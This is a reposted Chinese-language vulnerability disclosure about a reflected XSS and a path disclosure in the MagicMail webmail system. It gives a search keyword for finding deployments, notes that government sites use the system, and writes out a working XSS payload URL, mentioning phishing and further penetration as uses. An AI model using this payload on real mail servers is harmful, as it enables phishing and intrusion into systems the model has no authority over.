好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

MagicMail迈捷邮件系统XSS及绝对路径漏洞 - 网站安

今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统 漏洞

 

包含  一个反射性XSS  以及  绝对路径泄漏

看了看 貌似全部是linux的。

 

关键字:迈捷邮件系统 by MagicMail

可以看到很多政府网站都用这个邮件系统

绝对路径 http://www.2cto.com /index.php?login_type=declare&language=

XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E

虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的 渗透 等等

 

修复方案: 看官方补丁吧

查看更多关于MagicMail迈捷邮件系统XSS及绝对路径漏洞 - 网站安的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13374
  阅读:49次

上一篇: 网易博客一处存储型跨站 - 网站安全 - 自学php

下一篇:PHP 5.3.4(WIN) COM_SINK权限提升漏洞 - 网站安全 - 自

相关资讯